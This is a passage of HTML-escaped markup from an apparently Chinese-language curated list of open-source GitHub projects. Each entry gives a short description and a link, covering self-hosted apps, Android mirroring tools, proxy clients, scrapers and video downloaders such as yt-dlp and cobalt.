            &lt;a href=&quot;https://github.com/jhildenbiddle/docsify-themeable&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;docsify-themeable&lt;/a&gt; - 一个为 &lt;code&gt;docsify.js&lt;/code&gt; 设计的&lt;strong&gt;简单主题系统&lt;/strong&gt;，具有丰富的自定义选项的多个主题，改进的桌面和移动体验，以及对传统浏览器的支持（ &lt;code&gt;IE11+&lt;/code&gt; ）。&lt;a href=&quot;https://jhildenbiddle.github.io/docsify-themeable&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/SelfhostedPro/Yacht&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Yacht&lt;/a&gt; - 一个用于&lt;strong&gt;管理 &lt;code&gt;docker&lt;/code&gt; 容器的网络界面&lt;/strong&gt;，强调模板化，提供一键部署。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/barry-ran/QtScrcpy&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;QtScrcpy&lt;/a&gt; - &lt;code&gt;QtScrcpy&lt;/code&gt; 可以通过 &lt;code&gt;USB&lt;/code&gt; /网络连接 &lt;code&gt;Android&lt;/code&gt; 设备，并进行显示和控制。无需 &lt;code&gt;root&lt;/code&gt; 权限。同时支持 &lt;code&gt;GNU/Linux&lt;/code&gt;，&lt;code&gt;Windows&lt;/code&gt; 和 &lt;code&gt;MacOS&lt;/code&gt; 三大主流桌面平台
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/makeplane/plane&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;plane&lt;/a&gt; - 开源的 &lt;code&gt;JIRA&lt;/code&gt;，线性和高度替代。&lt;code&gt;Plane&lt;/code&gt; 帮助你以最简单的方式跟踪你的问题、史诗和产品路线图。&lt;a href=&quot;https://app.plane.so/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/itorr/china-ex&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;china-ex&lt;/a&gt; - 「中国制霸生成器」中国三十四省份制霸标记工具。&lt;a href=&quot;https://lab.magiconch.com/china-ex/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/ciaochaos/qrbtf&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;qrbtf&lt;/a&gt; - 艺术二维码生成器。&lt;a href=&quot;https://qrbtf.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Genymobile/scrcpy&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;scrcpy&lt;/a&gt; - 支持通过 &lt;code&gt;USB&lt;/code&gt; /网络在 &lt;code&gt;Linux&lt;/code&gt;，&lt;code&gt;Windows&lt;/code&gt; 和 &lt;code&gt;MacOS&lt;/code&gt; 投影操作 &lt;code&gt;Android&lt;/code&gt; 设备。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/wallabag/wallabag&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;wallabag&lt;/a&gt; - 一个用于保存和组织网络内容的自托管应用程序。它允许用户保存文章、新闻、博客帖子等网页内容，并在需要时进行阅读。&lt;a href=&quot;https://app.wallabag.it/register&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Alvin9999/new-pac&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;new-pac&lt;/a&gt; - 免费科学上网、&lt;code&gt;VPN&lt;/code&gt;、一键翻墙浏览器，&lt;code&gt;vps&lt;/code&gt; 一键搭建翻墙服务器脚本/教程。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/antfu/qrcode-toolkit&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;qrcode-toolkit&lt;/a&gt; - 一个主要用于人工智能&lt;strong&gt;生成二维码&lt;/strong&gt;的工具包，能够生成基本的二维码，并与输出的二维码进行比较，找到错位的像素。&lt;a href=&quot;https://qrcode.antfu.me/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/tl-open-source/tl-rtc-file&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;tl-rtc-file&lt;/a&gt; - 用 &lt;code&gt;webrt&lt;/code&gt; 在 &lt;code&gt;web&lt;/code&gt; 端传输文件，支持传输超大文件。&lt;a href=&quot;https://im.iamtsm.cn/file&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/immich-app/immich&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;immich&lt;/a&gt; - 高性能的自托管照片和视频备份应用。&lt;a href=&quot;https://demo.immich.app/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/photoprism/photoprism&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;photoprism&lt;/a&gt; - 去中心化网络的人工智能照片应用程序。&lt;a href=&quot;https://docs.photoprism.app/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt; &lt;a href=&quot;https://try.photoprism.app/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/xitanggg/open-resume&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;open-resume&lt;/a&gt; - 一款功能强大的开源简历生成器和简历解析器。&lt;a href=&quot;https://www.open-resume.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/wanhebin/clash-for-linux&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;clash-for-linux&lt;/a&gt; - &lt;code&gt;Linux&lt;/code&gt; 端使用 &lt;code&gt;Clash&lt;/code&gt; 作为代理工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Pawdroid/Free-servers&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Free-servers&lt;/a&gt; - 免费 &lt;code&gt;clash&lt;/code&gt; 订阅地址，免费翻墙、免费科学上网、免费梯子、免费 &lt;code&gt;ss/v2ray/trojan&lt;/code&gt; 节点、谷歌商店、翻墙梯子。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/AmruthPillai/Reactive-Resume&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Reactive-Resume&lt;/a&gt; - 独一无二的简历生成器。安全，可定制，可移植，开源且永久免费。&lt;a href=&quot;https://rxresu.me/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/ether/etherpad-lite&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;etherpad-lite&lt;/a&gt; - 一个现代的实时协作文档编辑器。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/tldraw/tldraw&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;tldraw&lt;/a&gt; - 一个轻量级的画图工具。&lt;a href=&quot;https://www.tldraw.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/varkor/quiver&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;quiver&lt;/a&gt; - 一个现代的网络交换图编辑器。&lt;a href=&quot;https://q.uiver.app/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/shibing624/pycorrector&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;pycorrector&lt;/a&gt; - 中文文本纠错工具。支持中文音似、形似、语法错误纠正。&lt;a href=&quot;https://www.mulanai.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/mtlynch/logpaste&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;logpaste&lt;/a&gt; - 用于存储文本日志文件的简单 &lt;code&gt;Web&lt;/code&gt; 服务。&lt;a href=&quot;https://logpaste.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/microsoft/inshellisense&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;inshellisense&lt;/a&gt; - 为 &lt;code&gt;Shell&lt;/code&gt; 提供 &lt;code&gt;IDE&lt;/code&gt; 风格的自动完成功能。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/screego/server&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;server&lt;/a&gt; - 浏览器屏幕共享工具。&lt;a href=&quot;https://app.screego.net/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://screego.net/#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/keiko233/clash-nyanpasu&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;clash-nyanpasu&lt;/a&gt; - 基于 &lt;code&gt;tauri&lt;/code&gt; 的 &lt;code&gt;Clash&lt;/code&gt; 图形化软件。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/remotion-dev/github-unwrapped-2023&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;github-unwrapped-2023&lt;/a&gt; - &lt;code&gt;Github&lt;/code&gt; 年度代码统计生成视频工具。&lt;a href=&quot;https://www.githubunwrapped.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/star-history/star-history&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;star-history&lt;/a&gt; - 一个可以查看 &lt;code&gt;GitHub&lt;/code&gt; 项目历史 &lt;code&gt;star&lt;/code&gt; 数的项目。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/vastsa/FileCodeBox&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;FileCodeBox&lt;/a&gt; - 文件快递柜-匿名口令分享文本，文件，像拿快递一样取文件。&lt;a href=&quot;https://share.lanol.cn/#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/chubin/cheat.sh&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;cheat.sh&lt;/a&gt; - 一个优雅的研发搜索工具。&lt;a href=&quot;https://cheat.sh/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/pdone/FreeControl&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;FreeControl&lt;/a&gt; - 在 &lt;code&gt;PC&lt;/code&gt; 上控制 &lt;code&gt;Android&lt;/code&gt; 设备的工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/koalaman/shellcheck&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;shellcheck&lt;/a&gt; - 静态 &lt;code&gt;Shell&lt;/code&gt; 脚本分析工具。&lt;a href=&quot;https://www.shellcheck.net/#&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/taojy123/KeymouseGo&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;KeymouseGo&lt;/a&gt; - 类似按键精灵的鼠标键盘录制和自动化操作，模拟点击和键入。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/MZCretin/RollToolsApi&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;RollToolsApi&lt;/a&gt; - 一个提供开发中常用数据的一个稳定聚合 &lt;code&gt;Api&lt;/code&gt; 接口源。&lt;a href=&quot;https://www.mxnzp.com/doc/list&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/505e06b2/Image-to-Braille&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Image-to-Braille&lt;/a&gt; - 图片转点阵文本生成器。&lt;a href=&quot;https://505e06b2.github.io/Image-to-Braille/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/wuyasong/github-profile-generator&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;github-profile-generator&lt;/a&gt; - &lt;code&gt;GitHub&lt;/code&gt; 个人主页生成器。&lt;a href=&quot;https://githubprofile.com/zh&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/mulaRahul/keyviz&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;keyviz&lt;/a&gt; - 一个免费的开源工具，可以实时可视化键盘和鼠标操作。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/phodal/github&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;github&lt;/a&gt; - &lt;code&gt;GitHub&lt;/code&gt; 漫游指南。&lt;a href=&quot;https://github.phodal.com/#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/revezone/revezone&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;revezone&lt;/a&gt; - 一款以图形为中心、轻量级、本地优先的用于构建第二大脑的效率工具，支持 &lt;code&gt;Excalidraw&lt;/code&gt;、&lt;code&gt;Tldraw&lt;/code&gt; 白板和类 &lt;code&gt;Notion&lt;/code&gt; 笔记。&lt;a href=&quot;https://revezone.com/index.html&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Elegycloud/clash-for-linux-backup&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;clash-for-linux-backup&lt;/a&gt; - &lt;code&gt;Linux&lt;/code&gt; 最完整的 &lt;code&gt;Clash for Linux&lt;/code&gt; 的备份仓库，完全可以使用。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/talebook/talebook&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;talebook&lt;/a&gt; - 一个简单的在线版个人书库。&lt;a href=&quot;https://demo.talebook.org/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/TransparentLC/WechatMomentScreenshot&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;WechatMomentScreenshot&lt;/a&gt; - 朋友圈转发截图生成工具。&lt;a href=&quot;https://akarin.dev/WechatMomentScreenshot/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/NanmiCoder/MediaCrawler&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;MediaCrawler&lt;/a&gt; - 小红书爬虫、抖音爬虫、快手爬虫、B站爬虫、微博爬虫。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/oddfar/campus-imaotai&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;campus-imaotai&lt;/a&gt; - i茅台app自动预约，每日自动预约，支持docker一键部署。&lt;a href=&quot;https://oddfar.github.io/campus-doc/campus-imaotai/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/schlagmichdoch/pairdrop&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;pairdrop&lt;/a&gt; - 在浏览器中实现本地文件传输共享。&lt;a href=&quot;https://pairdrop.net/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/NaiboWang/EasySpider&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;EasySpider&lt;/a&gt; - 一个可视化浏览器自动化测试/数据采集/爬虫软件。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/LC044/WeChatMsg&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;WeChatMsg&lt;/a&gt; - 一款强大的微信聊天记录管理工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/jzillmann/pdf-to-markdown&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;pdf-to-markdown&lt;/a&gt; - &lt;code&gt;PDF&lt;/code&gt; 转成 &lt;code&gt;Markdown&lt;/code&gt; 工具。&lt;a href=&quot;https://pdf2md.morethan.io/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/renzhezhilu/webp2jpg-online&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;webp2jpg-online&lt;/a&gt; - 使用浏览器的在线图片格式转化器。&lt;a href=&quot;https://imagestool.com/webp2jpg-online/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/bytelang/kplayer-go&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;kplayer-go&lt;/a&gt; - 一款用于在 &lt;code&gt;Linux&lt;/code&gt; 环境下进行媒体资源推流的应用程序。&lt;a href=&quot;https://docs.kplayer.net/v0.5.8/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/sigoden/dufs&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;dufs&lt;/a&gt; - 多功能的文件服务器工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/lint-md/lint-md&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;lint-md&lt;/a&gt; - 检查中文 &lt;code&gt;Markdown&lt;/code&gt; 编写格式规范的命令行工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/jgm/pandoc&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;pandoc&lt;/a&gt; - 通用文件转换器。&lt;a href=&quot;https://pandoc.org/try/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;下载工具项目&quot;&gt;
    &lt;a href=&quot;?id=%e4%b8%8b%e8%bd%bd%e5%b7%a5%e5%85%b7%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;下载工具项目&quot;&gt;下载工具项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/yt-dlp/yt-dlp&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;yt-dlp&lt;/a&gt; &lt;img src=&quot;https://img.shields.io/github/stars/yt-dlp/yt-dlp?style=social&quot; data-origin=&quot;https://img.shields.io/github/stars/yt-dlp/yt-dlp?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/forks/yt-dlp/yt-dlp?style=social&quot; data-origin=&quot;https://img.shields.io/github/forks/yt-dlp/yt-dlp?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/license/yt-dlp/yt-dlp&quot; data-origin=&quot;https://img.shields.io/github/license/yt-dlp/yt-dlp&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/last-commit/yt-dlp/yt-dlp&quot; data-origin=&quot;https://img.shields.io/github/last-commit/yt-dlp/yt-dlp&quot; alt=&quot;&quot;/&gt; - 功能丰富的命令行音频/视频下载器。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Tyrrrz/YoutubeDownloader&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;YoutubeDownloader&lt;/a&gt; &lt;img src=&quot;https://img.shields.io/github/stars/Tyrrrz/YoutubeDownloader?style=social&quot; data-origin=&quot;https://img.shields.io/github/stars/Tyrrrz/YoutubeDownloader?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/forks/Tyrrrz/YoutubeDownloader?style=social&quot; data-origin=&quot;https://img.shields.io/github/forks/Tyrrrz/YoutubeDownloader?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/license/Tyrrrz/YoutubeDownloader&quot; data-origin=&quot;https://img.shields.io/github/license/Tyrrrz/YoutubeDownloader&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/last-commit/Tyrrrz/YoutubeDownloader&quot; data-origin=&quot;https://img.shields.io/github/last-commit/Tyrrrz/YoutubeDownloader&quot; alt=&quot;&quot;/&gt; - &lt;code&gt;Youtube&lt;/code&gt; &lt;strong&gt;视频下载工具&lt;/strong&gt;。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/ytdl-org/youtube-dl&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;youtube-dl&lt;/a&gt; &lt;img src=&quot;https://img.shields.io/github/stars/ytdl-org/youtube-dl?style=social&quot; data-origin=&quot;https://img.shields.io/github/stars/ytdl-org/youtube-dl?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/forks/ytdl-org/youtube-dl?style=social&quot; data-origin=&quot;https://img.shields.io/github/forks/ytdl-org/youtube-dl?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/license/ytdl-org/youtube-dl&quot; data-origin=&quot;https://img.shields.io/github/license/ytdl-org/youtube-dl&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/last-commit/ytdl-org/youtube-dl&quot; data-origin=&quot;https://img.shields.io/github/last-commit/ytdl-org/youtube-dl&quot; alt=&quot;&quot;/&gt; - 一个从 &lt;code&gt;YouTube&lt;/code&gt; 和其他视频网站&lt;strong&gt;下载视频&lt;/strong&gt;的工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/imputnet/cobalt&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;cobalt&lt;/a&gt; &lt;img src=&quot;https://img.shields.io/github/stars/imputnet/cobalt?style=social&quot; data-origin=&quot;https://img.shields.io/github/stars/imputnet/cobalt?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/forks/imputnet/cobalt?style=social&quot; data-origin=&quot;https://img.shields.io/github/forks/imputnet/cobalt?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/license/imputnet/cobalt&quot; data-origin=&quot;https://img.shields.io/github/license/imputnet/cobalt&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/last-commit/imputnet/cobalt&quot; data-origin=&quot;https://img.shields.io/github/last-commit/imputnet/cobalt&quot; alt=&quot;&quot;/&gt; - 一个免费、无广告且易于使用的媒体下载工具。&lt;a href=&quot;https://cobalt.tools/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
